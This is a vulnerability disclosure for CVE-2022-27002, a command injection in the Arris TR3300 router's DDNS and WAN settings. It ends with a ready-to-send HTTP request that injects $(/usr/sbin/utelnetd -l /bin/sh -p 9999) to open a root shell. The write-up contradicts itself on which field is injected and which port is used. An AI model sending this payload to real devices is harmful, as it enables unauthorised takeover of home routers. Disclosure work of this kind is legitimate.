Headline
CVE-2022-27002: my_vuln/10.md at main · wudipjq/my_vuln
Arris TR3300 v1.0.13 were discovered to contain a command injection vulnerability in the ddns function via the ddns_name, ddns_pwd, h_ddns?ddns_host parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.
ARRIS Vulnerability
Vendor:ARRIS
Product:TR3300
Version:1.0.13(Download Link:https://arris.secure.force.com/consumers/ConsumerProductDetail?p=a0ha000000OlZ68AAF&c=SURFboard%20Routers)
Type:Remote Command Execution
Author:Jiaqian Peng
Institution:[email protected]
Vulnerability description
We found an Command Injection vulnerability in ARRIS router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.
Remote Command Execution
In setup.cgi
binary:
In the router’s ddns
function(ddns.html
), ddns_name、ddns_pwd、h_ddns、ddns_host
is directly passed by the attacker, so we can control the ddns_name、ddns_pwd、h_ddns、ddns_host
to attack the OS.
First, accept and process the content of the field(ddns_user_name、ddns_password、ddns_service_provider、ddns_host_name
), and then call the function nvram_set
to store this input.
In rc_apps
binary:
Eventually, in sub_41E880
function, the initial input will be extracted and cause command injection.
Supplement
BUT!!!
When receiving user input, there are very strict checks. But we can use $()
to bypass it!
In order to avoid such problems, we believe that the string content should be checked in the input extraction part.
PoC
We set ddns_name
as $(/usr/sbin/utelnetd -l /bin/sh -p 10002), and the router will excute it,such as:
POST /setup.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 378 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/wan_dyna.html Upgrade-Insecure-Requests: 1
dhcpc_enable=&hostname=$(/usr/sbin/utelnetd -l /bin/sh -p 9999)&dyna_mtu=1500&itsbutton1=Apply&webpage=wan_dyna.html&action=Apply&wan_access=eth1&wan_proto=dhcp&et1macaddr=00%3A30%3ABD%3AF6%3AEE%3A94&m_wan_hostname=TR3300&m_autodns=1&pppoe_autodns=1&dhcp_autodns=1&m_wan_aliasip=&todo=save&h_dhcpc_enable=enable&todo=save&this_file=wan_dyna.html&next_file=wan_dyna.html&message=
Result
Get a shell!